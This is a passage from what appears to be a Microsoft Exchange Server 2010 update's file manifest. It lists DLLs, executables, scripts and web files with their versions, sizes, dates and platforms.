03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 14.3.470.0| 36,272| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 14.3.487.0| 89,808| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 14.3.470.0| 182,184| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.core.strings.dll| 14.3.470.0| 163,528| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 14.3.487.0| 429,776| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 14.3.470.0| 21,424| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.directory.dll| 14.3.470.0| 3,469,144| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 14.3.470.0| 83,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.dll| 14.3.470.0| 921,432| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.data.filedistributionservice.eventlog.dll| 14.3.470.0| 28,592| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.mapi.dll| 14.3.487.0| 220,880| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.providers.dll| 14.3.487.0| 184,016| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 14.3.470.0| 98,136| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.storage.dll| 14.3.487.0| 5,287,632| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 14.3.470.0| 28,592| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.data.throttlingservice.client.dll| 14.3.470.0| 52,936| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.datacenterstrings.dll| 14.3.470.0| 81,544| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.diagnostics.dll| 14.3.470.0| 827,080| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 14.3.470.0| 28,288| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.edgesync.common.dll| 14.3.470.0| 167,768| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 14.3.470.0| 233,312| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 14.3.470.0| 29,616| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 14.3.470.0| 114,528| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.extensibility.eventlog.dll| 14.3.470.0| 20,400| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.extensibility.internal.dll| 14.3.470.0| 446,304| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.groupmetrics.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.groupmetricsservicelet.dll| 14.3.470.0| 28,296| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.helpprovider.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 14.3.470.0| 23,984| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.imap4.exe| 14.3.487.0| 225,192| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.imap4service.exe| 14.3.487.0| 28,880| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 14.3.470.0| 53,088| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.infoworker.common.dll| 14.3.487.0| 1,470,160| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll| 14.3.470.0| 23,904| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 14.3.470.0| 58,800| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 14.3.487.0| 131,008| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.instantmessaging.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:49| x86 \nMicrosoft.exchange.irm.formprotector.dll| 14.3.470.0| 159,144| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 14.3.470.0| 59,312| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 14.3.470.0| 53,680| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.isam.esebcli.dll| 14.3.470.0| 95,576| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.isam.interop.dll| 14.3.470.0| 363,352| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.live.domainservices.dll| 14.3.470.0| 135,000| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 14.3.487.0| 577,232| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 14.3.487.0| 364,240| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 14.3.470.0| 30,640| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.mailboxreplicationservice.provider.dll| 14.3.487.0| 179,920| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 14.3.487.0| 126,672| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 14.3.487.0| 122,576| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.mailsubmission.eventlog.dll| 14.3.470.0| 22,448| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.management.controlpanel.dll| 14.3.496.0| 3,650,440| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 14.3.470.0| 34,736| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.management.detailstemplates.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.dll| 14.3.487.0| 12,291,792| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.management.edge.systemmanager.dll| 14.3.470.0| 77,512| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.nativeresources.dll| 14.3.470.0| 208,328| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.management.powershell.support.dll| 14.3.487.0| 110,288| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.management.publicfolders.dll| 14.3.470.0| 151,240| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 14.3.487.0| 2,563,792| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.management.systemmanager.dll| 14.3.470.0| 1,281,736| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.managementgui.dll| 14.3.470.0| 5,418,696| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.managementmsg.dll| 14.3.470.0| 33,712| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.messagesecurity.dll| 14.3.470.0| 93,832| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 14.3.470.0| 81,544| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 14.3.487.0| 114,600| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 14.3.487.0| 31,960| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 14.3.487.0| 138,960| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 14.3.487.0| 179,920| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 14.3.487.0| 32,976| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.mobiledriver.dll| 14.3.487.0| 155,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.monitoring.eventlog.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.monitoring.exe| 14.3.487.0| 73,424| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.net.dll| 14.3.470.0| 2,186,952| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.oabauthmodule.dll| 14.3.470.0| 25,736| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.oabmaintenance.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.oabmaintenanceservicelet.dll| 14.3.470.0| 56,968| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 14.3.470.0| 22,984| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.pop3.exe| 14.3.487.0| 98,000| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.pop3service.exe| 14.3.487.0| 28,880| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.popimap.core.dll| 14.3.487.0| 159,440| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.powershell.configuration.dll| 14.3.487.0| 200,400| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 14.3.487.0| 81,616| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.protectedservicehost.exe| 14.3.487.0| 32,464| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.provisioningagent.dll| 14.3.487.0| 192,208| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.pst.dll| 14.3.470.0| 179,848| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.routingtablelogparser.dll| 14.3.470.0| 110,216| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.rpc.dll| 14.3.470.0| 873,672| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.rpcclientaccess.coexistence.dll| 14.3.470.0| 24,200| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.dll| 14.3.487.0| 126,672| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 14.3.470.0| 73,344| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 14.3.487.0| 437,968| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 14.3.470.0| 601,736| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 14.3.487.0| 110,504| 03-Jan-2020| 05:50| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 14.3.487.0| 89,808| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 14.3.487.0| 65,232| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 14.3.470.0| 29,104| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 14.3.470.0| 26,976| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.search.exsearch.exe| 14.3.487.0| 417,488| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.search.exsearchmsg.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.search.native.dll| 14.3.470.0| 138,440| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.security.dll| 14.3.487.0| 192,208| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 14.3.470.0| 20,400| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.servicehost.exe| 14.3.487.0| 35,752| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.services.dll| 14.3.487.0| 3,145,424| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.services.eventlogs.dll| 14.3.470.0| 32,688| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 14.3.470.0| 52,872| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.common.dll| 14.3.470.0| 454,280| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.exsetupuihelper.dll| 14.3.470.0| 216,712| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 14.3.470.0| 74,376| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.sqm.dll| 14.3.470.0| 65,224| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.storedriver.dll| 14.3.487.0| 556,752| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.storedriver.eventlog.dll| 14.3.470.0| 23,472| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.storeprovider.dll| 14.3.470.0| 859,784| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.structuredquery.dll| 14.3.470.0| 159,944| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 14.3.470.0| 29,320| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.headerconversion.dll| 14.3.470.0| 26,248| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 14.3.470.0| 233,096| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 14.3.470.0| 23,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 14.3.470.0| 44,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 14.3.470.0| 65,160| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 14.3.470.0| 73,352| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 14.3.487.0| 57,040| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.dll| 14.3.487.0| 1,916,624| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.eventlog.dll| 14.3.470.0| 104,368| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.logging.search.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.sync.common.dll| 14.3.487.0| 442,064| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 14.3.470.0| 18,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.sync.worker.dll| 14.3.487.0| 1,072,848| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 14.3.470.0| 21,936| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.clientstrings.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.lad.dll| 14.3.470.0| 123,528| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.prompts.dll| 14.3.470.0| 212,616| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 14.3.487.0| 188,112| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcommon.dll| 14.3.487.0| 765,856| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcore.dll| 14.3.487.0| 1,384,144| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 14.3.470.0| 108,976| 03-Jan-2020| 05:46| x64 \nMicrosoft.managementgui.dll| 14.3.470.0| 155,336| 03-Jan-2020| 05:45| x86 \nMicrosoft.powershell.hostingtools.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:48| x86 \nMicrosoft.powershell.hostingtools_2.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:45| x86 \nMigbase.dll| 14.3.470.0| 783,792| 03-Jan-2020| 05:48| x64 \nMigmsg.dll| 14.3.470.0| 91,560| 03-Jan-2020| 05:46| x64 \nMigrateumcustomprompts.ps1| Not applicable| 16,986| 03-Jan-2020| 05:47| Not applicable \nMoveallreplicas.ps1| Not applicable| 13,043| 03-Jan-2020| 05:47| Not applicable \nMovemailbox.ps1| Not applicable| 56,868| 03-Jan-2020| 05:47| Not applicable \nMovetransportdatabase.ps1| Not applicable| 28,466| 03-Jan-2020| 05:47| Not applicable \nMsallog.dll| 14.3.470.0| 46,504| 03-Jan-2020| 05:46| x64 \nMsexchangeadtopologyservice.exe| 14.3.470.0| 114,096| 03-Jan-2020| 05:50| x64 \nMsexchangefds.exe| 14.3.470.0| 110,280| 03-Jan-2020| 05:46| x86 \nMsexchangelesearchworker.exe| 14.3.487.0| 89,808| 03-Jan-2020| 05:47| x86 \nMsexchangemailboxassistants.exe| 14.3.487.0| 802,512| 03-Jan-2020| 05:46| x86 \nMsexchangemailboxreplication.exe| 14.3.470.0| 27,272| 03-Jan-2020| 05:46| x86 \nMsexchangemailsubmission.exe| 14.3.487.0| 118,480| 03-Jan-2020| 05:46| x86 \nMsexchangerepl.exe| 14.3.487.0| 69,328| 03-Jan-2020| 05:46| x86 \nMsexchangethrottling.exe| 14.3.470.0| 48,840| 03-Jan-2020| 05:46| x86 \nMsexchangetransport.exe| 14.3.470.0| 81,544| 03-Jan-2020| 05:46| x86 \nMsexchangetransportlogsearch.exe| 14.3.487.0| 212,688| 03-Jan-2020| 05:48| x86 \nMsfte1.dll| 14.0.7177.5001| 3,228,440| 03-Jan-2020| 05:48| x64 \nMsgedt.js| Not applicable| 4,778| 03-Jan-2020| 05:46| Not applicable \nMsglst.js| Not applicable| 3,295| 03-Jan-2020| 05:46| Not applicable \nNewtestcasconnectivityuser.ps1| Not applicable| 20,120| 03-Jan-2020| 05:47| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 22,443| 03-Jan-2020| 05:47| Not applicable \nNtspxgen.dll| 14.3.470.0| 87,472| 03-Jan-2020| 05:45| x64 \nOabgen.dll| 14.3.470.0| 356,784| 03-Jan-2020| 05:48| x64 \nOcemul.dll| 8.5.3.76| 54,112| 03-Jan-2020| 05:49| x64 \nOilink.dll| 8.5.3.76| 464,736| 03-Jan-2020| 05:49| x86 \nOilink.exe| 8.5.3.76| 317,280| 03-Jan-2020| 05:49| x64 \nOilink.jar| Not applicable| 1,425,202| 03-Jan-2020| 05:49| Not applicable \nOitnsf.id| Not applicable| 4,688| 03-Jan-2020| 05:49| Not applicable \nOit_font_metrics.db| Not applicable| 375,808| 03-Jan-2020| 05:49| Not applicable \nOleconverter.exe| 14.3.470.0| 162,736| 03-Jan-2020| 05:46| x64 \nOswin64.dll| 8.5.3.76| 103,272| 03-Jan-2020| 05:49| x64 \nOutsidein.dll| 8.5.3.76| 296,296| 03-Jan-2020| 05:49| x86 \nOwaauth.dll| 14.3.470.0| 104,880| 03-Jan-2020| 05:46| x64 \nOwasl.xap| Not applicable| 36,280| 03-Jan-2020| 05:46| Not applicable \nOwasmime.msi| Not applicable| 2,297,856| 03-Jan-2020| 05:45| Not applicable \nOwaspell.dll| 14.3.470.0| 50,608| 03-Jan-2020| 05:49| x64 \nPerfnm.h| Not applicable| 47,627| 03-Jan-2020| 05:50| Not applicable \nPerf_common_extrace.dll| 14.3.470.0| 170,416| 03-Jan-2020| 05:48| x64 \nPerf_exchmem.dll| 14.3.470.0| 71,600| 03-Jan-2020| 05:48| x64 \nPerf_mdbsz.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:50| x64 \nPolicytest.exe| 14.3.470.0| 51,632| 03-Jan-2020| 05:48| x64 \nPremium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 68,859| 03-Jan-2020| 05:47| Not applicable \nPrepare_moverequest.ps1| Not applicable| 69,054| 03-Jan-2020| 05:47| Not applicable \nPublishedstartpage.js| Not applicable| 15,353| 03-Jan-2020| 05:46| Not applicable \nQuietexe.exe| 14.3.470.0| 21,640| 03-Jan-2020| 05:47| x86 \nReadpost.aspx| Not applicable| 6,516| 03-Jan-2020| 05:49| Not applicable \nReadsharingmessage.ascx| Not applicable| 5,235| 03-Jan-2020| 05:49| Not applicable \nReadvoicemailmessage.aspx| Not applicable| 9,320| 03-Jan-2020| 05:49| Not applicable \nRedir.aspx| Not applicable| 1,714| 03-Jan-2020| 05:49| Not applicable \nRedistributeactivedatabases.ps1| Not applicable| 114,387| 03-Jan-2020| 05:47| Not applicable \nReenable_auditloggingagent.ps1| Not applicable| 12,395| 03-Jan-2020| 05:47| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 20,402| 03-Jan-2020| 05:47| Not applicable \nRemoteexchange.ps1| Not applicable| 19,447| 03-Jan-2020| 05:47| Not applicable \nRemovereplicafrompfrecursive.ps1| Not applicable| 13,887| 03-Jan-2020| 05:47| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 13,191| 03-Jan-2020| 05:47| Not applicable \nReplacereplicaonpfrecursive.ps1| Not applicable| 14,292| 03-Jan-2020| 05:47| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 13,551| 03-Jan-2020| 05:47| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 13,547| 03-Jan-2020| 05:47| Not applicable \nReplaycrimsonevents.man| Not applicable| 247,121| 03-Jan-2020| 05:48| Not applicable \nReplaycrimsonmsg.dll| 14.3.470.0| 266,440| 03-Jan-2020| 05:48| x64 \nResetattachmentfilterentry.ps1| Not applicable| 13,332| 03-Jan-2020| 05:47| Not applicable \nResetcasservice.ps1| Not applicable| 19,563| 03-Jan-2020| 05:47| Not applicable \nResetsearchindex.ps1| Not applicable| 14,653| 03-Jan-2020| 05:47| Not applicable \nReset_antispamupdates.ps1| Not applicable| 12,017| 03-Jan-2020| 05:48| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 15,126| 03-Jan-2020| 05:47| Not applicable \nRightsmanagementwrapper.dll| 14.3.470.0| 86,440| 03-Jan-2020| 05:48| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 53,296| 03-Jan-2020| 05:47| Not applicable \nRoutingview.exe| 14.3.470.0| 167,560| 03-Jan-2020| 05:48| x86 \nRulesauditmsg.dll| 14.3.470.0| 18,864| 03-Jan-2020| 05:48| x64 \nSccanno.dll| 8.5.3.76| 136,552| 03-Jan-2020| 05:49| x64 \nSccca.dll| 8.5.3.76| 46,944| 03-Jan-2020| 05:49| x64 \nSccch.dll| 8.5.3.76| 201,056| 03-Jan-2020| 05:49| x64 \nSccda.dll| 8.5.3.76| 151,904| 03-Jan-2020| 05:49| x64 \nSccdu.dll| 8.5.3.76| 617,824| 03-Jan-2020| 05:49| x64 \nSccex.dll| 8.5.3.76| 94,560| 03-Jan-2020| 05:49| x64 \nSccfa.dll| 8.5.3.76| 86,880| 03-Jan-2020| 05:49| x64 \nSccfi.dll| 8.5.3.76| 143,712| 03-Jan-2020| 05:49| x64 \nSccfmt.dll| 8.5.3.76| 75,616| 03-Jan-2020| 05:49| x64 \nSccfnt.dll| 8.5.3.76| 504,160| 03-Jan-2020| 05:49| x64 \nSccfut.dll| 8.5.3.76| 862,560| 03-Jan-2020| 05:49| x64 \nSccimg.dll| 8.5.3.76| 426,848| 03-Jan-2020| 05:49| x64 \nSccind.dll| 8.5.3.76| 68,960| 03-Jan-2020| 05:49| x64 \nScclo.dll| 8.5.3.76| 162,656| 03-Jan-2020| 05:49| x64 \nSccole2.dll| 8.5.3.76| 30,568| 03-Jan-2020| 05:49| x64 \nSccsd.dll| 8.5.3.76| 43,360| 03-Jan-2020| 05:49| x64 \nSccut.dll| 8.5.3.76| 2,001,248| 03-Jan-2020| 05:49| x64 \nSccxt.dll| 8.5.3.76| 54,624| 03-Jan-2020| 05:49| x64 \nServicecontrol.ps1| Not applicable| 45,721| 03-Jan-2020| 05:47| Not applicable \nSetup.com| 14.3.470.0| 444,928| 03-Jan-2020| 05:47| Not applicable \nSetup.exe| 14.3.470.0| 603,568| 03-Jan-2020| 05:47| x64 \nSmimeoptions.aspx| Not applicable| 10,805| 03-Jan-2020| 05:49| Not applicable \nSmimeparameterstandalone.js| Not applicable| 10,566| 03-Jan-2020| 05:47| Not applicable \nSmtpreceiveperfcounters.h| Not applicable| 1,014| 03-Jan-2020| 05:46| Not applicable \nSmtpreceiveperfcounters.ini| Not applicable| 11,910| 03-Jan-2020| 05:50| Not applicable \nSmtpreceiveperfcounters.xml| Not applicable| 3,439| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.h| Not applicable| 739| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.ini| Not applicable| 8,488| 03-Jan-2020| 05:50| Not applicable \nSmtpsendperfcounters.xml| Not applicable| 2,527| 03-Jan-2020| 05:50| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 22,566| 03-Jan-2020| 05:47| Not applicable \nStartpage.aspx| Not applicable| 10,891| 03-Jan-2020| 05:49| Not applicable \nStartpage.js| Not applicable| 177,388| 03-Jan-2020| 05:46| Not applicable \nStopdagservermaintenance.ps1| Not applicable| 15,837| 03-Jan-2020| 05:47| Not applicable \nStore.exe| 14.3.470.0| 6,941,640| 03-Jan-2020| 05:48| x64 \nStoretsconstants.ps1| Not applicable| 15,592| 03-Jan-2020| 05:49| Not applicable \nStoretslibrary.ps1| Not applicable| 25,360| 03-Jan-2020| 05:49| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 14.3.470.0| 37,296| 03-Jan-2020| 05:46| x64 \nTokenm.dll| 14.3.470.0| 66,984| 03-Jan-2020| 05:46| x64 \nTranscodingservice.exe| 14.3.470.0| 130,992| 03-Jan-2020| 05:46| x64 \nTroubleshoot_ci.ps1| Not applicable| 24,393| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 23,679| 03-Jan-2020| 05:49| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 29,030| 03-Jan-2020| 05:49| Not applicable \nUglobal.js| Not applicable| 984,109| 03-Jan-2020| 05:46| Not applicable \nUmservice.exe| 14.3.470.0| 147,080| 03-Jan-2020| 05:46| x86 \nUmworkerprocess.exe| 14.3.470.0| 56,968| 03-Jan-2020| 05:48| x86 \nUninstall_antispamagents.ps1| Not applicable| 12,489| 03-Jan-2020| 05:48| Not applicable \nUpdatecas.ps1| Not applicable| 16,662| 03-Jan-2020| 05:47| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 24,906| 03-Jan-2020| 05:47| Not applicable \nUview.js| Not applicable| 178,233| 03-Jan-2020| 05:46| Not applicable \nVlv.js| Not applicable| 140,614| 03-Jan-2020| 05:46| Not applicable \nVsacad.dll| 8.5.3.76| 14,228,832| 03-Jan-2020| 05:49| x64 \nVsacs.dll| 8.5.3.76| 41,824| 03-Jan-2020| 05:49| x64 \nVsami.dll| 8.5.3.76| 74,592| 03-Jan-2020| 05:49| x64 \nVsarc.dll| 8.5.3.76| 24,928| 03-Jan-2020| 05:49| x64 \nVsasf.dll| 8.5.3.76| 34,144| 03-Jan-2020| 05:49| x64 \nVsbdr.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:49| x64 \nVsbmp.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nVscdrx.dll| 8.5.3.76| 22,880| 03-Jan-2020| 05:49| x64 \nVscgm.dll| 8.5.3.76| 53,600| 03-Jan-2020| 05:49| x64 \nVsdbs.dll| 8.5.3.76| 26,464| 03-Jan-2020| 05:49| x64 \nVsdez.dll| 8.5.3.76| 31,072| 03-Jan-2020| 05:49| x64 \nVsdif.dll| 8.5.3.76| 25,952| 03-Jan-2020| 05:49| x64 \nVsdrw.dll| 8.5.3.76| 36,192| 03-Jan-2020| 05:49| x64 \nVsdx.dll| 8.5.3.76| 30,560| 03-Jan-2020| 05:49| x64 \nVsdxla.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nVsdxlm.dll| 8.5.3.76| 80,224| 03-Jan-2020| 05:49| x64 \nVsemf.dll| 8.5.3.76| 64,864| 03-Jan-2020| 05:49| x64 \nVsen4.dll| 8.5.3.76| 32,096| 